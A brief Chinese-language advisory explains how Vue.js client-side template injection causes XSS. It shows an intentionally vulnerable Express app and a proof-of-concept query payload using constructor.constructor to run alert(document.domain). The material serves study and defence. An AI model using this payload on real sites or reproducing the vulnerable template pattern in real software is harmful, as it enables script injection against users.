漏洞详情
由于程序员代码编写不当,将导致用户输入的数据,可以改变客户端模版的执行逻辑,从而造成XSS漏洞。
漏洞影响
漏洞分析
漏洞编写模板如下:
const express = require('express');
const helmet = require('helmet');
const escapeHTML = require('escape-html');
const app = express();
app.use(helmet());
app.get('/', (req, res) => {
res.set('Content-Type', 'text/html');
const name = req.query.name
res.status(200).send(`<!DOCTYPE html>
<html>
<body>
<div id="app">
<h1>Hello ?name=${escapeHTML(name)}</h1>
</div>
<footer>
<a href="https://github.com/azu/vue-client-side-template-injection-example">Source Code</a>
</footer>
<script src="https://cdn.jsdelivr.net/npm/vue@2.5.13/dist/vue.js"></script>
<script>
new Vue({
el: '#app'
});
</script>
</body>
</html>`);
});
module.exports = app;
漏洞利用
POC:
hxxp://host/name={{this.constructor.constructor(‘alert(document.domain)’)()}}
参考:
https://github.com/azu/vue-client-side-template-injection-example
